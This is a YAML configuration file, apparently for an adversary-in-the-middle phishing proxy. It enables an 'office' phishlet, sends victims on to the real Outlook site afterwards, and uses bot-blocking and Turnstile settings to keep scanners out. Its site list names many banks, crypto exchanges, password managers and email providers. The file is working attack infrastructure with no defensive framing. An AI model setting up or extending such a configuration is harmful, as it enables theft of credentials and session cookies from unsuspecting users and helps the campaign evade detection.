blacklist_mode: unauth
cookie_key: ""
ip: ""
lures:
    - hostname: ""
      info: ""
      og_desc: ""
      og_image: ""
      og_title: ""
      og_url: ""
      path: ""
      phishlet: office
      redirect_url: ""
      template: ""
      ua_filter: ""
nkpbot_enabled: false
ota_enabled: false
proxy_address: ""
proxy_enabled: false
proxy_password: ""
proxy_port: 0
proxy_type: http
proxy_username: ""
redirect_key: vo
redirect_url: https://outlook.office.com/mail/
server: ""
simplebot_enabled: false
site_domains:
    amazon: ""
    aws: ""
    binance: ""
    blockchain: ""
    boa: ""
    bypass-flagged: ""
    canada: ""
    cex: ""
    chase: ""
    coinbase: ""
    cryptobox: ""
    dashlane: ""
    discord: ""
    dropbox: ""
    europol: ""
    facebook: ""
    flexiti: ""
    gemini: ""
    gend: ""
    github: ""
    glady: ""
    godaddy: ""
    google: ""
    gov: ""
    hightail: ""
    icloud: ""
    instagram: ""
    knowbe4: ""
    lastpass: ""
    lcl: ""
    linkedin: ""
    mail: ""
    mailgun: ""
    nsbank: ""
    office: ""
    outlook: ""
    ovh: ""
    payfit: ""
    payoneer: ""
    paypal: ""
    poloniex: ""
    protonmail: ""
    sendgrid: ""
    skrill: ""
    skype: ""
    snapchat: ""
    stripe: ""
    tiktok: ""
    twitter: ""
    xfinity: ""
    yahoo: ""
sites_enabled:
    - office
turnstile_privkey: ""
turnstile_sitekey: 0x4AAAAAADQjZDgz9ScgrZwr
verification_key: mf
verification_token: d88e
webhook_verbosity: 1
